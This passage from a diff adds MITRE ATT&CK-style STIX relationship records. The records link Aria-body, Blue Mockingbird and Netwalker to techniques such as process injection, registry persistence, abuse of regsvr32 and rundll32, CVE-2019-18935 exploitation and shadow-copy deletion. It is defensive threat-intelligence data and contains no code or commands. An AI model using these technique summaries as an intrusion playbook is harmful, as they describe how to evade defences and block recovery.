+ "created": "2020-05-26T19:31:59.275Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--3161d76a-e2b2-4b97-9906-24909b735386",
+ "target_ref": "attack-pattern--f4599aa0-4f85-4a32-80ea-fc39dc965945",
+ "external_references": [
+ {
+ "source_name": "CheckPoint Naikon May 2020",
+ "url": "https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/",
+ "description": "CheckPoint. (2020, May 7). Naikon APT: Cyber Espionage Reloaded. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Aria-body](https://attack.mitre.org/software/S0456) has the ability to inject itself into another process such as rundll32.exe and dllhost.exe.(Citation: CheckPoint Naikon May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--ed113911-e21a-4b1b-a082-42313d5aa887",
+ "type": "relationship",
+ "modified": "2020-06-03T13:40:15.300Z",
+ "created": "2020-05-26T19:43:49.658Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--3161d76a-e2b2-4b97-9906-24909b735386",
+ "target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279",
+ "external_references": [
+ {
+ "source_name": "CheckPoint Naikon May 2020",
+ "url": "https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/",
+ "description": "CheckPoint. (2020, May 7). Naikon APT: Cyber Espionage Reloaded. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Aria-body](https://attack.mitre.org/software/S0456) has established persistence via the Startup folder or Run Registry key.(Citation: CheckPoint Naikon May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--76701e52-cfce-4294-91e4-485fad7c8f0f",
+ "type": "relationship",
+ "modified": "2020-05-26T19:43:49.669Z",
+ "created": "2020-05-26T19:43:49.669Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--73a80fab-2aa3-48e0-a4d0-3a4828200aee",
+ "target_ref": "attack-pattern--f1951e8a-500e-4a26-8803-76d95c4554b4",
+ "external_references": [
+ {
+ "source_name": "RedCanary Mockingbird May 2020",
+ "url": "https://redcanary.com/blog/blue-mockingbird-cryptominer/",
+ "description": "Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has executed custom-compiled XMRIG miner DLLs by configuring them to execute via the \"wercplsupport\" service.(Citation: RedCanary Mockingbird May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--8dc7e200-3c90-4611-9bbe-aa90056f423e",
+ "type": "relationship",
+ "modified": "2020-06-25T13:59:09.612Z",
+ "created": "2020-05-26T20:09:39.224Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--73a80fab-2aa3-48e0-a4d0-3a4828200aee",
+ "target_ref": "attack-pattern--b97f1d35-4249-4486-a6b5-ee60ccf24fab",
+ "external_references": [
+ {
+ "source_name": "RedCanary Mockingbird May 2020",
+ "url": "https://redcanary.com/blog/blue-mockingbird-cryptominer/",
+ "description": "Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has executed custom-compiled XMRIG miner DLLs using regsvr32.exe.(Citation: RedCanary Mockingbird May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--b04c89b2-f790-4961-a012-7ccd18d1436e",
+ "type": "relationship",
+ "modified": "2020-06-25T13:59:09.699Z",
+ "created": "2020-05-26T20:09:39.243Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--73a80fab-2aa3-48e0-a4d0-3a4828200aee",
+ "target_ref": "attack-pattern--045d0922-2310-4e60-b5e4-3302302cb3c5",
+ "external_references": [
+ {
+ "source_name": "RedCanary Mockingbird May 2020",
+ "url": "https://redcanary.com/blog/blue-mockingbird-cryptominer/",
+ "description": "Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has executed custom-compiled XMRIG miner DLLs using rundll32.exe.(Citation: RedCanary Mockingbird May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--66513679-0866-4091-a346-2679db5e3cca",
+ "type": "relationship",
+ "modified": "2020-06-25T13:59:09.792Z",
+ "created": "2020-05-26T20:09:39.246Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--73a80fab-2aa3-48e0-a4d0-3a4828200aee",
+ "target_ref": "attack-pattern--3f886f2a-874f-4333-b794-aa6075009b1c",
+ "external_references": [
+ {
+ "source_name": "RedCanary Mockingbird May 2020",
+ "url": "https://redcanary.com/blog/blue-mockingbird-cryptominer/",
+ "description": "Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has gained initial access by exploiting CVE-2019-18935, a vulnerability within Telerik UI for ASP.NET AJAX.(Citation: RedCanary Mockingbird May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--a4bb6f26-b659-4d1d-b0fc-f4f4efe32db6",
+ "type": "relationship",
+ "modified": "2020-06-25T13:59:09.795Z",
+ "created": "2020-05-26T20:09:39.255Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--3161d76a-e2b2-4b97-9906-24909b735386",
+ "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "external_references": [
+ {
+ "source_name": "CheckPoint Naikon May 2020",
+ "url": "https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/",
+ "description": "CheckPoint. (2020, May 7). Naikon APT: Cyber Espionage Reloaded. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Aria-body](https://attack.mitre.org/software/S0456) has the ability to enumerate loaded modules for a process.(Citation: CheckPoint Naikon May 2020).",
+ "relationship_type": "uses",
+ "id": "relationship--0ed0ef18-126f-4a03-ac2a-f315dfb48b7d",
+ "type": "relationship",
+ "modified": "2020-06-03T13:40:15.308Z",
+ "created": "2020-05-26T20:33:11.668Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--3161d76a-e2b2-4b97-9906-24909b735386",
+ "target_ref": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670",
+ "external_references": [
+ {
+ "source_name": "CheckPoint Naikon May 2020",
+ "url": "https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/",
+ "description": "CheckPoint. (2020, May 7). Naikon APT: Cyber Espionage Reloaded. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Aria-body](https://attack.mitre.org/software/S0456) has the ability to launch files using ShellExecute.(Citation: CheckPoint Naikon May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--1681f4aa-4bb1-482a-8fdf-8c1b724635d9",
+ "type": "relationship",
+ "modified": "2020-06-03T13:40:15.314Z",
+ "created": "2020-05-26T20:33:11.713Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--3161d76a-e2b2-4b97-9906-24909b735386",
+ "target_ref": "attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd",
+ "external_references": [
+ {
+ "source_name": "CheckPoint Naikon May 2020",
+ "url": "https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/",
+ "description": "CheckPoint. (2020, May 7). Naikon APT: Cyber Espionage Reloaded. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Aria-body](https://attack.mitre.org/software/S0456) has the ability to use a DGA for C2 communications.(Citation: CheckPoint Naikon May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--17bfea1d-e3c8-4bf9-8102-576e7c87883e",
+ "type": "relationship",
+ "modified": "2020-06-03T13:40:15.319Z",
+ "created": "2020-05-26T20:33:11.721Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--3161d76a-e2b2-4b97-9906-24909b735386",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "external_references": [
+ {
+ "source_name": "CheckPoint Naikon May 2020",
+ "url": "https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/",
+ "description": "CheckPoint. (2020, May 7). Naikon APT: Cyber Espionage Reloaded. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Aria-body](https://attack.mitre.org/software/S0456) has the ability to download additional payloads from C2.(Citation: CheckPoint Naikon May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--cbb686ae-3dc8-4e91-80fc-075209505425",
+ "type": "relationship",
+ "modified": "2020-05-26T20:33:11.746Z",
+ "created": "2020-05-26T20:33:11.746Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--3161d76a-e2b2-4b97-9906-24909b735386",
+ "target_ref": "attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688",
+ "external_references": [
+ {
+ "source_name": "CheckPoint Naikon May 2020",
+ "url": "https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/",
+ "description": "CheckPoint. (2020, May 7). Naikon APT: Cyber Espionage Reloaded. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Aria-body](https://attack.mitre.org/software/S0456) has the ability to capture screenshots on compromised hosts.(Citation: CheckPoint Naikon May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--535b87bb-31fd-4e14-8279-c64c301e912d",
+ "type": "relationship",
+ "modified": "2020-06-03T13:40:15.365Z",
+ "created": "2020-05-26T20:33:11.729Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--3161d76a-e2b2-4b97-9906-24909b735386",
+ "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "external_references": [
+ {
+ "source_name": "CheckPoint Naikon May 2020",
+ "url": "https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/",
+ "description": "CheckPoint. (2020, May 7). Naikon APT: Cyber Espionage Reloaded. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Aria-body](https://attack.mitre.org/software/S0456) has the ability to decrypt the loader configuration and payload DLL.(Citation: CheckPoint Naikon May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--26303f07-87f0-4740-b6ea-e81e8c01b267",
+ "type": "relationship",
+ "modified": "2020-05-26T20:33:11.754Z",
+ "created": "2020-05-26T20:33:11.754Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--3161d76a-e2b2-4b97-9906-24909b735386",
+ "target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c",
+ "external_references": [
+ {
+ "source_name": "CheckPoint Naikon May 2020",
+ "url": "https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/",
+ "description": "CheckPoint. (2020, May 7). Naikon APT: Cyber Espionage Reloaded. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Aria-body](https://attack.mitre.org/software/S0456) has the ability to delete files and directories on compromised hosts.(Citation: CheckPoint Naikon May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--61bf5c24-e7ae-4178-916d-d236e928b897",
+ "type": "relationship",
+ "modified": "2020-05-26T20:33:11.730Z",
+ "created": "2020-05-26T20:33:11.730Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--3161d76a-e2b2-4b97-9906-24909b735386",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "source_name": "CheckPoint Naikon May 2020",
+ "url": "https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/",
+ "description": "CheckPoint. (2020, May 7). Naikon APT: Cyber Espionage Reloaded. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Aria-body](https://attack.mitre.org/software/S0456) has used an encrypted configuration file for its loader.(Citation: CheckPoint Naikon May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--914406e6-9388-477d-ba6b-97e5ebec31f0",
+ "type": "relationship",
+ "modified": "2020-06-03T13:40:15.355Z",
+ "created": "2020-05-26T20:33:11.739Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--3161d76a-e2b2-4b97-9906-24909b735386",
+ "target_ref": "attack-pattern--7e150503-88e7-4861-866b-ff1ac82c4475",
+ "external_references": [
+ {
+ "source_name": "CheckPoint Naikon May 2020",
+ "url": "https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/",
+ "description": "CheckPoint. (2020, May 7). Naikon APT: Cyber Espionage Reloaded. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Aria-body](https://attack.mitre.org/software/S0456) has the ability to gather TCP and UDP table status listings.(Citation: CheckPoint Naikon May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--ff87edd7-34b1-47f2-9131-dd6a47854805",
+ "type": "relationship",
+ "modified": "2020-06-03T13:40:15.341Z",
+ "created": "2020-05-26T20:36:16.472Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--3161d76a-e2b2-4b97-9906-24909b735386",
+ "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
+ "external_references": [
+ {
+ "source_name": "CheckPoint Naikon May 2020",
+ "url": "https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/",
+ "description": "CheckPoint. (2020, May 7). Naikon APT: Cyber Espionage Reloaded. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Aria-body](https://attack.mitre.org/software/S0456) has the ability to gather metadata from a file and to search for file and directory names.(Citation: CheckPoint Naikon May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--cbc2cb80-8f07-46dd-b167-3f237e39f39d",
+ "type": "relationship",
+ "modified": "2020-05-27T13:35:36.771Z",
+ "created": "2020-05-26T20:36:16.477Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--2a158b0a-7ef8-43cb-9985-bf34d1e12050",
+ "target_ref": "malware--3161d76a-e2b2-4b97-9906-24909b735386",
+ "external_references": [
+ {
+ "source_name": "CheckPoint Naikon May 2020",
+ "url": "https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/",
+ "description": "CheckPoint. (2020, May 7). Naikon APT: Cyber Espionage Reloaded. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "(Citation: CheckPoint Naikon May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--fd8fa359-c13e-4641-9c3e-d03218daee0c",
+ "type": "relationship",
+ "modified": "2020-05-26T20:37:19.548Z",
+ "created": "2020-05-26T20:37:19.548Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--754effde-613c-4244-a83e-fb659b2a4d06",
+ "target_ref": "attack-pattern--ac08589e-ee59-4935-8667-d845e38fe579",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Netwalker May 2020",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/netwalker-fileless-ransomware-injected-via-reflective-loading/",
+ "description": "Victor, K.. (2020, May 18). Netwalker Fileless Ransomware Injected via Reflective Loading . Retrieved May 26, 2020."
+ },
+ {
+ "source_name": "Sophos Netwalker May 2020",
+ "url": "https://news.sophos.com/en-us/2020/05/27/netwalker-ransomware-tools-give-insight-into-threat-actor/",
+ "description": "Szappanos, G., Brandt, A.. (2020, May 27). Netwalker ransomware tools give insight into threat actor. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[Netwalker](https://attack.mitre.org/software/S0457) can detect and terminate active security software-related processes on infected systems.(Citation: TrendMicro Netwalker May 2020)(Citation: Sophos Netwalker May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--19c0c01d-5f43-4a4d-8385-0862f6b1bf78",
+ "type": "relationship",
+ "modified": "2020-05-27T22:05:32.146Z",
+ "created": "2020-05-26T21:02:38.352Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--754effde-613c-4244-a83e-fb659b2a4d06",
+ "target_ref": "attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Netwalker May 2020",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/netwalker-fileless-ransomware-injected-via-reflective-loading/",
+ "description": "Victor, K.. (2020, May 18). Netwalker Fileless Ransomware Injected via Reflective Loading . Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Netwalker](https://attack.mitre.org/software/S0457) can detect and terminate active security software-related processes on infected systems.(Citation: TrendMicro Netwalker May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--67e2417b-793a-4082-94ca-445718e925b1",
+ "type": "relationship",
+ "modified": "2020-05-26T21:02:38.359Z",
+ "created": "2020-05-26T21:02:38.359Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--754effde-613c-4244-a83e-fb659b2a4d06",
+ "target_ref": "attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Netwalker May 2020",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/netwalker-fileless-ransomware-injected-via-reflective-loading/",
+ "description": "Victor, K.. (2020, May 18). Netwalker Fileless Ransomware Injected via Reflective Loading . Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Netwalker](https://attack.mitre.org/software/S0457) can terminate system processes and services, some of which relate to backup software.(Citation: TrendMicro Netwalker May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--e6a3f7bf-33c3-4d4c-bb27-46bd2842c750",
+ "type": "relationship",
+ "modified": "2020-06-08T16:07:36.211Z",
+ "created": "2020-05-26T21:02:38.417Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--754effde-613c-4244-a83e-fb659b2a4d06",
+ "target_ref": "attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Netwalker May 2020",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/netwalker-fileless-ransomware-injected-via-reflective-loading/",
+ "description": "Victor, K.. (2020, May 18). Netwalker Fileless Ransomware Injected via Reflective Loading . Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Netwalker](https://attack.mitre.org/software/S0457) can add the following registry entry: HKEY_CURRENT_USER\\SOFTWARE\\{8 random characters}.(Citation: TrendMicro Netwalker May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--0775a1ba-c95a-472e-ab1c-d21108acc907",
+ "type": "relationship",
+ "modified": "2020-06-08T16:07:36.216Z",
+ "created": "2020-05-26T21:02:38.430Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--754effde-613c-4244-a83e-fb659b2a4d06",
+ "target_ref": "attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Netwalker May 2020",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/netwalker-fileless-ransomware-injected-via-reflective-loading/",
+ "description": "Victor, K.. (2020, May 18). Netwalker Fileless Ransomware Injected via Reflective Loading . Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Netwalker](https://attack.mitre.org/software/S0457) can use WMI to delete Shadow Volumes.(Citation: TrendMicro Netwalker May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--e50b989c-9ad6-44c6-8eb7-b44af742cc40",
+ "type": "relationship",
+ "modified": "2020-06-08T16:07:36.243Z",
+ "created": "2020-05-26T21:02:38.432Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--754effde-613c-4244-a83e-fb659b2a4d06",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Netwalker May 2020",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/netwalker-fileless-ransomware-injected-via-reflective-loading/",
+ "description": "Victor, K.. (2020, May 18). Netwalker Fileless Ransomware Injected via Reflective Loading . Retrieved May 26, 2020."
+ },
+ {
+ "source_name": "Sophos Netwalker May 2020",
+ "url": "https://news.sophos.com/en-us/2020/05/27/netwalker-ransomware-tools-give-insight-into-threat-actor/",
+ "description": "Szappanos, G., Brandt, A.. (2020, May 27). Netwalker ransomware tools give insight into threat actor. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[Netwalker](https://attack.mitre.org/software/S0457)'s PowerShell script has been obfuscated with multiple layers including base64 and hexadecimal encoding and XOR-encryption, as well as obfuscated PowerShell functions and variables. [Netwalker](https://attack.mitre.org/software/S0457)'s DLL has also been embedded within the PowerShell script in hex format.(Citation: TrendMicro Netwalker May 2020)(Citation: Sophos Netwalker May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--87282f36-42f5-4eb1-9fec-778bc0f846b7",
+ "type": "relationship",
+ "modified": "2020-06-08T16:07:36.246Z",
+ "created": "2020-05-26T21:02:38.494Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--754effde-613c-4244-a83e-fb659b2a4d06",
+ "target_ref": "attack-pattern--f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Netwalker May 2020",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/netwalker-fileless-ransomware-injected-via-reflective-loading/",
+ "description": "Victor, K.. (2020, May 18). Netwalker Fileless Ransomware Injected via Reflective Loading . Retrieved May 26, 2020."
+ },
+ {
+ "source_name": "Sophos Netwalker May 2020",
+ "url": "https://news.sophos.com/en-us/2020/05/27/netwalker-ransomware-tools-give-insight-into-threat-actor/",
+ "description": "Szappanos, G., Brandt, A.. (2020, May 27). Netwalker ransomware tools give insight into threat actor. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[Netwalker](https://attack.mitre.org/software/S0457) can delete the infected system's Shadow Volumes to prevent recovery.(Citation: TrendMicro Netwalker May 2020)(Citation: Sophos Netwalker May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--87343ae5-53c9-426c-abab-602c8041dafe",
+ "type": "relationship",
+ "modified": "2020-06-08T16:07:36.279Z",
+ "created": "2020-05-26T21:02:38.497Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--754effde-613c-4244-a83e-fb659b2a4d06",
+ "target_ref": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Netwalker May 2020",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/netwalker-fileless-ransomware-injected-via-reflective-loading/",
+ "description": "Victor, K.. (2020, May 18). Netwalker Fileless Ransomware Injected via Reflective Loading . Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Netwalker](https://attack.mitre.org/software/S0457) can use Windows API functions to inject the ransomware DLL.(Citation: TrendMicro Netwalker May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--aa045472-7c41-49c5-af44-4df9cf1fa073",
+ "type": "relationship",
+ "modified": "2020-06-08T16:07:36.282Z",
+ "created": "2020-05-26T21:02:38.500Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--754effde-613c-4244-a83e-fb659b2a4d06",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Netwalker May 2020",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/netwalker-fileless-ransomware-injected-via-reflective-loading/",
+ "description": "Victor, K.. (2020, May 18). Netwalker Fileless Ransomware Injected via Reflective Loading . Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Netwalker](https://attack.mitre.org/software/S0457) can determine the system architecture it is running on to choose which version of the DLL to use.(Citation: TrendMicro Netwalker May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--1c3bc7ec-cabe-4c8f-9d6e-99afd877e845",
+ "type": "relationship",
+ "modified": "2020-06-08T16:07:36.276Z",
+ "created": "2020-05-26T21:02:38.507Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--754effde-613c-4244-a83e-fb659b2a4d06",
+ "target_ref": "attack-pattern--f4599aa0-4f85-4a32-80ea-fc39dc965945",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Netwalker May 2020",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/netwalker-fileless-ransomware-injected-via-reflective-loading/",
+ "description": "Victor, K.. (2020, May 18). Netwalker Fileless Ransomware Injected via Reflective Loading . Retrieved May 26, 2020."
+ }
+ ],
+ "description": "The [Netwalker](https://attack.mitre.org/software/S0457) DLL has been injected reflectively into the memory of a legitimate running process.(Citation: TrendMicro Netwalker May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--f1091b2c-ea09-402b-9717-8b7526fb5c13",
+ "type": "relationship",
+ "modified": "2020-06-08T16:07:36.281Z",
+ "created": "2020-05-26T21:02:38.804Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
